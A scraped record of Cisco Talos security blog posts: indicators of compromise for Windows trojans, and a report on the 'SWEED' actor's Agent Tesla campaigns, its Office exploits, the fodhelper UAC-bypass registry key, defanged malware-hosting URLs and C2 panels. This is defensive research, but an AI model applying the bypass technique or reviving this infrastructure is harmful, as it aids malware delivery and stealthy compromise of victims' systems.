%SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\ftoidjlwgv.exe\n * \\;Z:000000000000d46c\\192.168.0.1\\vm9-116\\DeviceConfigManager.bat\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Temporary Internet Files\\Content.IE5\\H3T7LZRL\\b11[1].exe\n * %WinDir%\\M-5050572947025827857375865240\\winmgr.exe\n * %TEMP%\\phqghumeay\n * \\;Z:000000000000d46c\\192.168.0.1\\vm9-116\\\\.lnk\n * %TEMP%\\rgjqmvnkyr\n * %TEMP%\\edakubnfgu\n * \\;Z:000000000000d46c\\192.168.0.1\\vm9-116\\DeviceConfigManager.vbs\n * %TEMP%\\gwhroqkhwu\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\rdwpamlgaz.bat\n**File Hashes** \n\n\n * 22bcff79015a6f2d450ff4713bc1a195f6333444e96e616fb070ccf885f790ad\n * c06da956f726a78aff82e8c2ec2ed7989f227ac560511512fd609574685f6c4f\n * e474e51a6f29b9e32702445797ef4baaa96b1e30fa3f212ae2953bbb843a559b\n * c9329790645ae7404cd3c746b9a26bcd667b6c1c45f727e504d0833d04726488\n * b95a5e8f1dc23677e9e700b44d014aeee127869e46af6a674f93d34da3c606d0\n * f3ee9f0be76f80faaa683ef580e3f018e1e0108e5b4457bad379e99dda2c627f\n * b010ae9122a8651be194c5bc3d49540d51287040f1a1f066e193835f942277a9\n * d775f05eb68ce4ef44776de0ad2b3c6181ad6a99813612a1ce3cc8b453359482\n * a3940c00bd3e8d07eb70cd23148d030a473f134a7aa19ff6b777862af6d5f8e3\n * 2104784585c92828df37feab86fcabddf3ffdb2718dfc3718ae529ad9c4956e0\n * 43d2b149b3e4fd33b03321d2bfb6980734d3725483fee21cd996f280618865d9\n * 9e7ae2436474bbad1e9ce20f8fc7a294586fde89c39b3bd2e2fd257d269ca636\n * 10c96fcbeee7e93309abc9616958ef214953f512f236ddff2db39f12a8f4a817\n * 08c9fedfcf1100f8450ad930a55a2cbf7dcc0fa88b646da2c5916ff42565c575\n * 113e003896939e85f048e528b6f50fa9e984009fe2677143c7cfaad9ee693293\n * 0d136160f510d87af7edeeb1533979a5cdc1d1511528798d5871bbb88bb1f0f4\n * 33fd94f82800a1f8551e73aebbbac4169c3c08cbe12c69e9fab52875d56c96bc\n * 1b6651d1e43c7ff8dd291d178b8bad9fbfd1bb426d49da419ee7e4a4d7912ba1\n * 1cfd3043ecc8fd7c254201fcafe6865dfdb1c0d6ccc343d0e62e1cab261fefa3\n * 201c0ca83973186aab93376147f1b60d009ef13ec827d0de5d19b483d3c0f353\n * 23db71997ed2f558e06232f600d3cc7b4e5eb58f18039923127c5b4fa7fec2f9\n * 26f1a92cb36e4caff3fccc45fba269647410fbee71cc4f4a00e5d4c282ba01f8\n * 2ab47d6d82225c62487054db91e804418060b3334531e09d96dc6d3630fa54b3\n * 34ae5c841f6e992fe09979fff521d2e8367385260cf73112e79ce656e952bbb5\n * 564ace4ef8e2c3aab367969748e02a0dee555733e9085fcc0a86b9f1b70fb7b3\n \n\n\n#### Coverage\n\n[](<https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://1.bp.blogspot.com/-586c8HIpYVc/Wk_VcUZpheI/AAAAAAAABmM/vnDsbXZDCDscIhN-e7_l1CmkdAtqdf9iwCLcBGAs/s1600/Win_Trojan_Generic_6414413_0_amp.png>)\n\n \n\n\n \n**ThreatGrid** \n\n\n[](<https://2.bp.blogspot.com/-2oJ3C2DXuwE/Wk_VzF1AvMI/AAAAAAAABmQ/S6REomwRJR0pFq5LQCQ-6yThXxgu9ChOgCLcBGAs/s1600/Win_Trojan_CeeInject_6414409_0_threatgrid.png>)\n\n \n\n\n \n**Umbrella** \n\n\n[](<https://4.bp.blogspot.com/-LjzaFaQTSEY/Wk_V2sSDRcI/AAAAAAAABmY/4rUB2jaZdXcutMXc_RvvnAjE3u3gT0ymgCLcBGAs/s1600/Win_Trojan_Generic_6414413_0_umbrella.png>)\n\n \n\n\n \n \n \n \n\n\n* * *\n\n \n\n\n### Win.Trojan.Multi-6413508-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * **<HKU>\\\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **Logman\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS**\n * **Value: **load\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS**\n * **Value: **run\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS**\n * **Value: **ProxyServer\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **internat.exe\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS**\n * **Value: **AutoDetect\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS**\n * **Value: **ProxyOverride\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\CONNECTIONS**\n * **Value: **DefaultConnectionSettings\n * **<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **Session Manager\n * **<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN**\n * **Value: **lsm service\n * **<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN**\n * **Value: **ClipSrv\n * **<HKLM>\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run**\n * **<HKCU>\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run**\n * **<HKU>\\\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CurrentVersion**\n * **<HKCU>\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\**\n * **<HKCU>\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings**\n * **<HKU>\\\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run**\n**Mutexes** \n\n\n * N/A\n**IP Addresses** \n\n\n * N/A\n**Domain Names** \n\n\n * www[.]wholists[.]org\n**Files and or directories created** \n\n\n * %System16%\\lsm.exe\n * %AppData%\\clipsrv.exe\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Windows\\lsm.exe (copy)\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\APPLIC~1\\MICROS~1\\Windows\\dllhost.exe (copy)\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\spoolsv.exe\n * %SystemDrive%\\Documents and Settings\\All Users\\Microsoft\\RCX2.tmp\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\RCX8.tmp\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\spoolsv.exe (copy)\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\APPLIC~1\\MICROS~1\\Windows\\RCX6.tmp\n * %AppData%\\ieudinit.exe\n * %SystemDrive%\\DOCUME~1\\ALLUSE~1\\clipsrv.exe\n * \\TEMP\\d0a08beb99882af4b1771426905ee556.exe\n * %SystemDrive%\\DOCUME~1\\ADMINI~1\\LOCALS~1\\APPLIC~1\\MICROS~1\\Windows\\dllhost.exe\n * \\Users\\Administrator\\AppData\\Local\\Microsoft\\dllhst3g.exe\n * %System16%\\smss.exe\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Windows\\RCX4.tmp\n * %WinDir%\\SysWOW64\\drivers\\ieudinit.exe\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Windows\\lsm.exe\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\dllhst3g.exe\n * %SystemDrive%\\Documents and Settings\\All Users\\Microsoft\\mstinit.exe (copy)\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\esentutl.exe\n * %SystemDrive%\\DOCUME~1\\ALLUSE~1\\clipsrv.exe (copy)\n * %SystemDrive%\\Documents and Settings\\All Users\\Microsoft\\mstinit.exe\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\dllhst3g.exe (copy)\n * %WinDir%\\spoolsv.exe (copy)\n * \\Users\\Administrator\\AppData\\Local\\Microsoft\\rsvp.exe\n * %WinDir%\\logman.exe\n * %WinDir%\\spoolsv.exe\n * %SystemDrive%\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\esentutl.exe (copy)\n**File Hashes** \n\n\n * ec3075ac9775e3c41bc8227a00ef76905bbd96a62b813c99f277865ff353c5ce\n * f4b6b76dec96cc9d530dd6cb64bdd743a115a12a7b03e41f7ec737e4d80b6850\n * b1da876da56ba09770d594765727d167bf1a655247f094360e032a35d3d41461\n * b82ebd17236c41d9e457f640a2871695326ef8014ebd71b7a5f37d8b2c3a4522\n * b3f5ad44f682104d536c60832d2064f71d3261ffbf0e1555c236a36b505619d3\n * a27376262110767a28e376b723caa46d3cc50d33da60029df8e7af024ff67be9\n * f1b2bbf13bde9ce65cbe1cee7e3d86a61e0511f206ae74589329dc1fffc5f7e0\n * 17023d977e2b041c8a1994e7ae69b65e10f7097febefc9b47817dd9f7985cd52\n * e5c95545895dc13626b3f20b47fe2f0f1b5dc3915fef44c3c7a5352e95beb382\n * 6d1b40fbdcad0c96c687f661469e39b7b10a0b083a9ea3c9f6bb959c284df149\n * 7d1ae051d633a3ed3c0991aaa3ed63357804a80e67dd19ae5deab71e525947a6\n * 799e5b77de09f7971f0187b69266e45f70e0cda170c615c604806ec2444ab89a\n * 910b590e28bc72bc14c05d47a026ed56928ea8b6608f626555d955beccb719c8\n * 7d326add0d36be4543317c4d14823e2cb380f7b07bacc1f893ec86bdd0b04468\n * 5af23d9dedc83e1fe8c808fe62d858767dd95f2b9402fa785072cc7247a2e4c6\n * bf828a8f3fb1a27532aa9f3fb0383a1ce3418f7dd52cefa4264ab2e3e941e8d9\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://1.bp.blogspot.com/-m6--9aAIz0w/Wk_V7LILV5I/AAAAAAAABmc/0snf5B6GpZw0RufzwH6FqQDcFpoap9oeQCLcBGAs/s1600/Win_Trojan_Multi_6413508_0_amp.png>)\n\n \n\n\n \n**ThreatGrid** \n\n\n[](<https://3.bp.blogspot.com/-l2quuN-P8Zc/Wk_V-slpUKI/AAAAAAAABmg/heGJ4LO4lyQsppK3WIocdrSzQu38VpHNQCLcBGAs/s1600/Win_Trojan_Multi_6413508_0_threatgrid.png>)\n\n \n\n\n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=td0xkcgyttQ:RxtX43oH4pU:yIl2AUoC8zA>)\n\n", "modified": "2018-01-05T19:46:49", "published": "2018-01-05T11:46:00", "id": "TALOSBLOG:F661E733634AB3D9655B38A94F050A82", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/td0xkcgyttQ/threat-round-up-1229-0105.html", "type": "talosblog", "title": "Threat Round Up for December 29 - January 5", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-16T13:39:08", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "description": "[](<https://1.bp.blogspot.com/-Xp7Khg9MvEw/XSx4ZhVm-YI/AAAAAAAABOk/pSp5aU7SN2UfdHZ4E_QUID3-Uz1MwXMugCLcBGAs/s1600/image2.jpg>)\n\n_By [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>) and other Cisco Talos researchers._ \n \n\n\n## Executive summary\n\n \nCisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we're calling \"SWEED,\" including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED \u2014 which has been operating since at least 2017 \u2014 primarily targets their victims with stealers and remote access trojans. \n \nSWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla \u2014 an information stealer that's been around since at least 2014. The version of Agent Tesla that SWEED is using differs slightly from [what we've seen in the past](<https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html>) in the way that it is packed, as well as how it infects the system. In this post, we'll run down each campaign we're able to connect to SWEED, and talk about some of the actor's tactics, techniques and procedures (TTPs). \n \n\n\n## 2017: Steganography\n\n \nOne of the earliest SWEED campaigns Talos identified dates back to 2017. In this attack, the actors placed droppers inside of ZIP archives, and then attached those ZIPs to emails. The attachments usually had file names similar to \"Java_Updater.zip\" or \"P-O of Jun2017.zip\". Here's an example of an email associated with this campaign: \n\n\n[](<https://1.bp.blogspot.com/-oWU68MijqXk/XSx4iC_vcXI/AAAAAAAABOo/rxXyjBR_k5EG85vC73E6ObkctJZ5ee9SACLcBGAs/s1600/image7.png>)\n\nThe attached ZIP archive contained a packed version of Agent Tesla. The packer uses .NET and leverages steganography to hide and decode a second .NET executable, which uses the same technique to retrieve the final Agent Tesla payload. Here's the file stored in the resource: \n\n\n[](<https://1.bp.blogspot.com/-knFhuKz76_o/XSx4uSyTszI/AAAAAAAABOw/2SY0bI1VbRo7qy3jaNDS9tnXrPIbBVOVACLcBGAs/s1600/image11.png>)\n\nAnd here's the algorithm used to decode the PE stored in that image: \n\n\n[](<https://1.bp.blogspot.com/-9ukoUYjLSK8/XSx41F7lNII/AAAAAAAABO4/j7CWyjabgZwMMGXuGSVJ0nT4ostrlKixQCLcBGAs/s1600/image24.png>)\n\nThe decoded binary is stored in the array. \n \n\n\n## January 2018: Java droppers\n\n \nIn early 2018, we observed that SWEED began leveraging Java-based droppers. Similar to previous campaigns, the JAR was directly attached to emails and used file names such as \"Order_2018.jar\". The purpose of the JAR was to obtain information about the infected system and facilitate the download of a packed version of Agent Tesla. Interestingly, only a few months prior to these campaigns, a HackForums user with the account name \"Sweed\" actively sought out a Java crypter \u2014 but we'll get to that activity later. \n \n\n\n## April 2018: Office exploit (CVE-2017-8759)\n\n \nIn April 2018, SWEED began making use of a previously disclosed Office exploit. One of the documents featured in these email campaigns was notable because it was a PowerPoint document (PPXS). Code contained inside one of the slides triggers an exploit for [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), a remote code execution vulnerability in Microsoft .NET framework. \n\n\n[](<https://1.bp.blogspot.com/-ButlTdkctLU/XSx47Vbm1HI/AAAAAAAABO8/fQdbIb4P7rUQoBYzALPbtxGb7pZaee8gQCLcBGAs/s1600/image20.png>)\n\nYou can see the execution of external content hosted on the attacker-controlled web server using the file name \"chuks.png\". As expected, the PNG is not actually an image. Instead, it is a Soap definition in XML, as seen in the screenshot below: \n\n\n[](<https://1.bp.blogspot.com/-KCgLbpK-I4Y/XSx5Cb3ofxI/AAAAAAAABPE/deEpu6woWsEmRDX41z9ps5EgTTOkhrTSgCLcBGAs/s1600/image22.png>)\n\nThe purpose of this code is to decode a URL and download a PE32 hosted on an attacker-controlled web server. The resulting executable is a packed version of Agent Tesla. \n \n\n\n## May 2018: Office exploit (CVE-2017-11882)\n\n \nIn May 2018, campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution. \n \nWe see how the vulnerability abuses the Equation Editor in Office when executing the sample in [ThreatGrid](<https://www.cisco.com/c/en/us/products/security/threat-grid/index.html>): \n\n\n[](<https://1.bp.blogspot.com/-rqu_XQHATkU/XSx5HQU7knI/AAAAAAAABPM/mdIn629s7Hkj8ohFeqCDX-IJksYTBJ1DgCLcBGAs/s1600/image6.png>)\n\nAs seen below, the malicious document is designed to appear as if it is an invoice. \n\n\n[](<https://1.bp.blogspot.com/-9Lfu-Hmvhc0/XSx5RGFN7lI/AAAAAAAABPU/BMMKWanPJhsgXGSeRuLE9ajHKXJWoKhFwCLcBGAs/s1600/image17.png>)\n\nAs consistent with previous campaigns, the purpose of this malicious document is to download and execute a packed version of Agent Tesla. \n \n\n\n## 2019: Office macros and AutoIT droppers\n\n \nBeginning in 2019, the campaigns associated with SWEED began leveraging malicious Office macros. As with previous attacks, they are leveraging spear-phishing emails and malicious attachments to initiate the infection process. \n\n\n[](<https://1.bp.blogspot.com/-bQPgXJQaOdg/XSx5XIHLMfI/AAAAAAAABPc/H5c7yDGbZnoBp81XkqzwfYlr-P6Chxe7gCLcBGAs/s1600/image27.png>)\n\nThe attached XLS contains an obfuscated VBA macro, which executes a PowerShell script using a WMI call. The PowerShell script is also obfuscated using XOR operations to hide its code. Once decoded, it reveals itself to be .NET. \n\n\n[](<https://1.bp.blogspot.com/-c6ZX94eFuqI/XSx5d5pE4JI/AAAAAAAABPk/ZrhHd5vFBlMYoa5x9FRBZeuAio2sR5e1ACLcBGAs/s1600/image15.png>)\n\nThis .NET code is responsible for performing some checks and downloading another executable file. The obfuscation scheme used in this code is the same as the one used in the previously described PowerShell. The downloaded file is then saved and executed. \n\n\n[](<https://1.bp.blogspot.com/-6qVpGRO-ux4/XSx5j5Bh8HI/AAAAAAAABPs/o1B4uJ62tbwLq5tk3NdL7VBYxsumRUIBgCLcBGAs/s1600/image16.png>)\n\n_Call graph after WMI execution._\n\n \nThe downloaded binary is an AutoIT-compiled script. The script has a lot of junk code designed to make the analysis more difficult and time-consuming. \n\n\n[](<https://1.bp.blogspot.com/-kYLwnGOOZig/XSx5sVAjTII/AAAAAAAABPw/FTPWLZ2i0v0jnBvrU7sR3wdT3iLR6rxXACLcBGAs/s1600/image4.png>)\n\n_Extracted AutoIT script_.\n\n \nThe strings and some of the commands contained in the AutoIT script have been obfuscated using XOR operations, as described below. \n\n\n[](<https://1.bp.blogspot.com/-Kf7HoJZ6aH0/XSx50BD08rI/AAAAAAAABP8/89e6-bQxt_ktyak6IIVTLT34jRSZpSr-gCLcBGAs/s1600/image5.png>)\n\nThe decoder receives two hex strings: The first is the string to deobfuscate, while the second determines the number of rounds of the XOR operation. The XOR operation is performed on each character against the length of the second parameter. This operation is then repeated for as many times as the length with the length and the position. If the length value is one, then the operation is repeated twice using the same key, which leads to a plaintext hex string. \n \nAfter performing environment checks, the malware will reconstruct the assembly code which is obfuscated in a hex string. Using the AutoIT scripting language Dll* family functions the code is loaded into the current process address space. \n\n\n[](<https://1.bp.blogspot.com/-ZFbG9POWDNE/XSx59SN17CI/AAAAAAAABQE/IovTMl2-Zo86q2kvzwGRIMKZVcBckylrQCLcBGAs/s1600/image1.png>)\n\n_Memory allocation_\n\n \nFinally, the malware executes the assembly code with two arguments. The first argument is the path for an executable. This assembly will create a process with the executable and will inject the payload into this process. \n\n\n[](<https://1.bp.blogspot.com/-d7phxrHgB4Y/XSx6HNelrwI/AAAAAAAABQI/ydJzAtVsnsYiobQHQN7p4A4YCb0Ny_XugCLcBGAs/s1600/image21.png>)\n\nAs expected, the final payload in this campaign is another packed version of Agent Tesla. \n\n\n[](<https://1.bp.blogspot.com/-P1Zs_-tFHmU/XSx6L3-WsXI/AAAAAAAABQM/VrTRIPvDsdUl9LPzReWzfso8qiuYL2-cgCLcBGAs/s1600/image13.jpg>)\n\n## UAC bypass\n\n \nOne of the common characteristics with several of the campaigns associated with SWEED is the use of various techniques to bypass User Account Control (UAC) on infected systems. An example of this is present within the campaigns observed in 2019. When the malware is first executed on systems, it executes \"fodhelper.exe\", which is a Windows process running as high integrity. Prior to executing it, the malware sets the following registry key: \n \n\n \n \n HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command\n\n \nThis registry key points to the location of the malicious executable: \n\n\n[](<https://1.bp.blogspot.com/-3Z3aByr5iz4/XSx6cWarvJI/AAAAAAAABQY/r8kMm29zPmQ6edJhyh_vHwqi-UdfpGscgCLcBGAs/s1600/image28.png>)\n\nThis key is used by \"fodhelper.exe\" and its value is executed as administrator whenever fodhelper.exe is executed. This functionality simply allows for the malware to bypass UAC and is not a privilege escalation vulnerability \u2014 the user must already have administrative access rights on the system. It is used to avoid displaying a UAC prompt to the user. This second instance of the malware is then executed with administrative access to the infected system. \n \n\n\n## SWEED infrastructure\n\n \nThe various distribution campaigns linked to SWEED feature use of a limited amount of distribution and C2 infrastructure with the same servers used across many different campaigns over long periods of time. The majority of the registrants associated with the domains used by SWEED list the following email addresses: \n \n\n \n \n aaras480@gmail[.]com \n sweed.[redacted]@gmail[.]com\n\n \nThe registrant contact information used to register most of the domains is also consistent: \n\n\n[](<https://1.bp.blogspot.com/-PeOGdJl28kg/XSx6llV7raI/AAAAAAAABQc/MHshudMMmtsNBok-nvAcLkWhiL2r2RtagCLcBGAs/s1600/image9.png>)\n\nIn April 2018, a security researcher published a [screenshot](<https://twitter.com/mrglaive/status/987780707551469569>) of an RDP server believed to have been actively leveraged by SWEED (84.38.134[.]121): \n\n\n[](<https://1.bp.blogspot.com/-3BeFHcPnORw/XSx6s-YzFRI/AAAAAAAABQg/QUT0mNw0LE0hcP1E4wTDzAhU7-uX0FV9ACLcBGAs/s1600/image19.png>)\n\nIn the screenshot above, the list of user accounts established on the RDP server can be seen, which includes an account named \"sweed.\" The fact that multiple users are currently active indicates that this server is being used in a multi-user capacity and provides a platform on which members of SWEED can function collaboratively. This also likely indicates a business relationship between multiple individuals responsible for these ongoing malware distribution campaigns. \n \nWe also identified several DDNS domains which were being used to facilitate connectivity to the shared RDP server that feature many of the same values as the RDP user accounts: \n\n\n * _sweedoffice[.]duckdns[.]org_\n * _sweedoffice-**olamide**[.]duckdns[.]org_\n * _sweedoffice-**chuks**[.]duckdns[.]org_\n * _www.sweedoffice-**kc**.duckdns[.]org_\n * _sweedoffice-**kc**.duckdns[.]org_\n * _sweedoffice-**goodman**.duckdns[.]org_\n * _sweedoffice-**bosskobi**.duckdns[.]org_\n * _www.sweedoffice-**olamide**.duckdns[.]org_\n * _www.sweedoffice-**chuks**.duckdns[.]org_\nDuring our analysis of various campaigns associated with SWEED, we identified several common elements that also reflect the distinct values associated with users of the RDP server. In many cases, the distribution servers being used to host malicious PE32 being distributed by SWEED contained a directory structure consisting of multiple directories containing the binaries being distributed. In many cases, the binary file names used, as well as the directory names used to host the malicious content reflected the same users present on the RDP server. \n \nFor example, in June 2019, the following URLs were hosting malicious content associated with these campaigns: \n\n\n * _hxxp://aelna[.]com/file/**chuks**.exe _\n * _hxxp://aelna[.]com/file/**sweed**.exe_\n * _hxxp://aelna[.]com/file/**duke**.exe_\nLikewise, when investigating samples associated with known domains used to exfiltrate sensitive information from infected systems, we can see the following binary file names being used repeatedly across campaigns over a long period of time: \n\n\n * _dadi.exe_\n * _kelly.exe_\n * _chuks.exe_\n * _olamide.exe_\n * _sweed.exe_\n * _kc.exe_\n * _hero.exe_\n * _goodman.exe_\n * _duke.exe_\n * _hipkid.exe_\nIn several cases, the directory structure present on the distribution servers contained multiple directories hosting malicious files, an example listing below using the domain sodismodisfrance[.]cf: \n\n\n * _sodimodisfrance[.]cf/2/**chuks**.exe_\n * _sodimodisfrance[.]cf/6/**chuks**.exe_\n * _sodimodisfrance[.]cf/5/**goodman**.exe_\n * _sodimodisfrance[.]cf/1/**chuks**.exe_\n * _sodimodisfrance[.]cf/1/**hipkid**.exe_\n * _sodimodisfrance[.]cf/5/**sweed**.exe_\n * _sodimodisfrance[.]cf/2/**duke.boys**.exe_\nThese appear to match the handles used by actors known to be associated with SWEED. Another known domain used to exfiltrate sensitive information collected by Agent Tesla is sweeddehacklord[.]us. Analysis of known malware seen communicating with this domain shows similar patterns of operations. \n \nIn analyzing the malware activity associated with SWEED, we also investigated the use of interesting paths in the hosting of the administration panels associated with the various RATs and stealers being distributed by this group. Indeed, on a single C2 server, we identified several panel with the following URLs: \n\n\n * _sweed-office.comie[.]ru/**goodman**/panel_\n * _sweed-office.comie[.]ru/**kc**/panel/_\n * _wlttraco[.]com/sweed-office/**omee**/panel/login.php_\n * _wlttraco[.]com/sweed-client/**humble1**/panel/post.php_\n * _wlttraco[.]com/sweed-client/**sima**/panel/post.php_\n * _wlttraco[.]com/sweed-office/**omee**/panel/post.php_\n * _wlttraco[.]com/sweed-office/**kc**/panel/post.php_\n * _wlttraco[.]com/sweed-office/**olamide**/panel/post.php_\n * _wlttraco[.]com/sweed-office/**jamil**/panel/post.php_\n * _wlttraco[.]com/sweed-client/**niggab**/panel/post.php_\n * _wlttraco[.]com/sweed-client/**humble2**/panel/post.php_\n * _wlttraco[.]com/sweed-office/**harry**/panel/post.php_\nBased on our research, as well as the panel-hosting locations, we believe that wiki, olamide, chuks, kc, goodman, bosskobi, dadi, hipkid, and others are SWEED customers or business associates. Using the binary file names, directory structures, and other artifacts, we have been able to identify interesting online behavior and interests exhibited across various hacking forums, IRC servers, etc. that appear to link some of these users with various elements of the malware distribution campaigns. \n \nThere are several other domains that can be linked to SWEED that appear to be associated with various malware families and distribution campaigns. These have been observed to resolve to the IP associated with the aforementioned RDP server, as well. \n\n\n * _sweeddehacklord[.]us_\n * _sweed-office.comie[.]ru_\n * _sweed-viki[.]ru_\n\n### Use of typosquatting\n\nAnother interesting element of many of the campaigns associated with SWEED is the use of typosquatting for the domains used to host the packed Agent Tesla binaries that have been distributed over the past few years. \n\n\n[](<https://1.bp.blogspot.com/-goK4dJ3zoZI/XSx695KKjYI/AAAAAAAABQs/WoF99-zl9q4RV7WgFUQbZvYEcklFRcDQwCLcBGAs/s1600/image10.jpg>)\n\n_Victims' geographic dispersion._\n\n \nLooking at the victimology from a country point of view it is clear that there is no geographic focus, when choosing their target. SWEED target companies all over the world. \n\n\n[](<https://1.bp.blogspot.com/-62VbjYV0b_E/XSx7G8IOETI/AAAAAAAABQw/ViXCuaMBtioHKcQHzDU_3Ii9SrEcBuKPwCLcBGAs/s1600/image30.jpg>)\n\n_Breakdown of victim's activity by industry._\n\n \nThe breakdown by activity however does show a clear tendency for manufacturing and logistics companies. \n \nHere's a rundown of these domains, along with the companies they are supposed to look like and the industry that the company is associated with. In some cases we were unable to determine the targeted organization from the typosquatted domain. \n\n\n[](<https://1.bp.blogspot.com/-LvOXntJ5RZE/XSx7QhmQQKI/AAAAAAAABQ4/_g8dFo0Y19kvdpRhbvHNamJQFNlLG-wJQCLcBGAs/s1600/image3.jpg>)\n\nIn all of the domains listed above, the registrant account information associated with the domains is consistent with what we have identified as associated with SWEED campaign activity. \n \n\n\n## Operational Security (OPSEC)\n\n \nWe identified various behavior on hacking forums, IRC channels, and other web sites that appeared consistent with the TTPs we observed with the actor distributing this malware. \n \n\n\n### \"SWEE D\"\n\nDuring our analysis, we identified a user on HackForums using the moniker \"SWEE D.\" In most of the online posts associated with this user, their contact information was included in the post and listed the Skype address \"sweed.[redacted]\". \n \nIn the months leading up to the January 2018 campaigns, we observed this user posting asking for access to a Java crypter. Typically, crypters are used to help evade antivirus detection as they \"crypt\" the contents of the malicious payload being distributed. \n\n\n[](<https://1.bp.blogspot.com/-83i7csrTS6k/XSx7lT916jI/AAAAAAAABRE/04B-iRVuMlYMekbBBRCx20TbRXstnqSbQCLcBGAs/s1600/image26.png>)\n\nThe same user posted repeatedly in threads related to Java crypters, and even annoyed other users with how often they were posting: \n\n\n[](<https://1.bp.blogspot.com/-pEcoYbx16c0/XSx7rQjsf3I/AAAAAAAABRI/BTCnpTi3Vl4UK-TVCRaJFdOwO8GbEvTWgCLcBGAs/s1600/image23.png>)\n\nThe same Skype account listed in the HackForums posts was also used by someone using the name \"Daniel\" in 2016 while commenting on a blog related to the creation of Facebook phishing pages: \n\n\n[](<https://1.bp.blogspot.com/-i3MehGGcxsw/XSx7xFcMIyI/AAAAAAAABRM/E72HNia0RYI4RjemxoAnOE4WmUTSSsaigCLcBGAs/s1600/image29.png>)\n\nThis same Skype account was also used in 2015 by someone going by the name \"[redacted] Daniel.\" \n\n\n[](<https://1.bp.blogspot.com/-O1bQZiICGMQ/XSx73OkDhXI/AAAAAAAABRU/Z6Px4plF2Q48mmatHvbn0XXjh_BdrHpwQCLcBGAs/s1600/image14.png>)\n\nNote: [redacted] is also the name used in the email address associated with the registrant account for the domain wlttraco[.]com (sweed.[redacted]@gmail.com). \n \nWe also located screenshots that were [published](<https://twitter.com/sS55752750/status/983260208091852800/photo/1>) on the Twitter account [.sS!.!](<https://twitter.com/sS55752750>) showing the Discord server \"Agent Tesla Live\" that listed sweed ([redacted] Daniel) as a member of the staff. 